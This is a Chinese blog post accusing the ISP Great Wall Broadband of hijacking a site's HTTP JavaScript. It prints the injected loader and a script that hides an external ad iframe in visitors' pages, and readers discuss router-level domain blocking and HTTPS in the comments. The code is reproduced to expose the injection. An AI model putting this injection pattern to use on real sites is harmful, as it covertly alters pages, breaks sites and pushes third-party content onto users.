长城宽带,你够了!请停止你的网络劫持行为!

家里的联通宽带到期了,最近小区长宽广告比较火热,什么50M宽带,一年300多块钱,一天只有一块钱。

实际情况呢。。最终抵不过低价的诱惑,牵了100M一年的,价格大概是570左右(上海地区)。一上来我就后悔了。网速慢,所谓的100M某些情况下敌不过联通的20M甚至是是10M。

想想这价格。。网速慢,我忍了。

但是你千不该万不该的去搞劫持啊!!!!

不要说我诬陷你们!!!

我有这样一个网站,里面引入了自己网站的一个js文件(假定是http://abc.def/ghi.js),
可实际加载下来后的文件变成了

var d=document;var h=d.getElementsByTagName("head")[0];var s1=d.createElement("script");s1.src="http://abc.def/ghi.js&ldf";h.appendChild(s1);var s2=d.createElement("script");s2.src="http://sb.wmxyx.com/js/actongpei.js";h.appendChild(s2);

很明显,js文件被劫持了,能做这种劫持的除了运营商还能有谁?!

页面被动态引入了一段不知道哪来的js,然后原本的js也被动态的重新引入,只是加了一个参数 ldf 估计是长宽服务器判断有ldf的时候再去访问原始资源?而且你劫持就算的,麻烦你做的不动声色好嘛?!!!你这么加参数是不对的你妈妈知道吗?你这么直接加个&ldf导致服务器直接拒绝返回404,也就是我原有的js根本就访问不到,现在页面都是空白。

再来分析被劫持的js另外注入的这个actongpei.js文件,在Chrome中打开这个js查看了下源码:

window.onload = function() {
    var d = document;
    var h = d.getElementsByTagName("head");
    var s = d.getElementsByTagName("script");
    var sh = "";
    for(var i = 0; i < s.length; i++) {
        sh = s[i].src;
        if(sh.indexOf("sb.wmxyx.com") != "-1") {

        } else {
            pcduan();
        }
    }
}

function pcduan() {
    var myDate = new Date();
    var huancun = localStorage.getItem("ldf");
    var hcsjjg = localStorage.getItem("ldfsjjg");
    if(huancun != null || myDate.toLocaleDateString().indexOf(huancun) != "-1") {
        if(myDate.getHours() - hcsjjg >= "20") {
            hxwjc();
            localStorage.setItem("ldf", myDate.toLocaleDateString());
            localStorage.setItem("ldfsjjg", myDate.getHours());
        } else {

        }
    } else {
        hxwjc();
        localStorage.setItem("ldf", myDate.toLocaleDateString());
        localStorage.setItem("ldfsjjg", myDate.getHours());
    }
}

function hxwjc() {
    var sUserAgent = navigator.userAgent.toLowerCase();
    var bIsIpad = sUserAgent.match(/ipad/i) == "ipad";
    var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os";
    var bIsMidp = sUserAgent.match(/midp/i) == "midp";
    var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";
    var bIsUc = sUserAgent.match(/ucweb/i) == "ucweb";
    var bIsAndroid = sUserAgent.match(/android/i) == "android";
    var bIsCE = sUserAgent.match(/windows ce/i) == "windows ce";
    var bIsWM = sUserAgent.match(/windows mobile/i) == "windows mobile";
    if(bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) {
        dm();
    } else {
        dm();
    }
}

function dm(){
        var div = document.createElement("div");
//        div.style.position = "fixed";
//        div.style.bottom = "0px";
//        div.style.right = "0px";
//        div.style.zIndex = "999999999";
        div.style.display = "none";
        div.id = "hxwjcid";
        document.getElementsByTagName("body").item(0).appendChild(div);

        var a = document.createElement("iframe");
        a.src = "http://dsa.gzshyjfls.com/yys/hxw/index-hxw-1214.html";
        a.width = "400px";
        a.height = "300px";
        a.frameborder = "no";
        a.style.border = "0";
        a.scrolling = "no";
        div.appendChild(a);
}

一个字,真特么烂!!!

赤裸裸的恶意植入,网页被强制插入了“http://dsa.gzshyjfls.com/yys/hxw/index-hxw-1214.html”这么一个iframe做推广?好吧,为了赚钱也是醉了。

暂且不说你这行为有多么恶劣吧,你瞅瞅这js写的有多烂!!!而且这些植入已经严重威胁到了用户网络安全,严重破坏了用户使用体验(现在我的一个网站因为这段js被恶意修改和注入,原本的js也因为加入了错误的参数而导致404无法正确引入,当前网站在长宽是打不开的)

怪我,没能力上HTTPS(某些地方确实是上不了HTTPS啊),被万恶的长宽给钻了空子,是人性的扭曲还是道德的沦丧,长宽,你够了!!!

最后,默默的在浏览器去广告工具(哦,不!是路由器层面)上禁掉了“wmxyx.com”和“gzshyjfls.com”两个域名。你不让我好过,我也不让你活。

最后友情提示一下,无论你什么原因,强烈建议不要用长城宽带!不要用长城宽带!不要用长城宽带!重要的事情说三遍!

立此文为时间戳,一年后,长宽再见!!!不,是再也不见!!!


本文地址:http://darren.ink/archives/126

相关文章:

标签: javascript, 原创

已有 5 条评论

  1. yeahyeah

    我在广州, 使用联通宽带也有这个, 不是长城, 有没有可能是路由插入? 你是用小米路由吗?

    <div id="atbxss" style="position: fixed; bottom: 0px; right: 0px; width: 300px; height: 250px; z-index: 999999999;">

    1. 我确实有用小米路由,但是之前一直用联通宽带没问题,换上长宽就不行了,

    2. search

      和你一样,宽带续费了之后就有这个界面出现,你在路由器里禁止它就可以了,我刚解决

  2. 其实全站https就完事了。。。

    1. 现在用的是阿里的免费虚拟主机,不支持https。
      而且使用https后播放器的音频引用网易云音乐的也会有问题,再加上七牛云的CDN没有免费https的流量,所以暂时还没考虑上https

添加新评论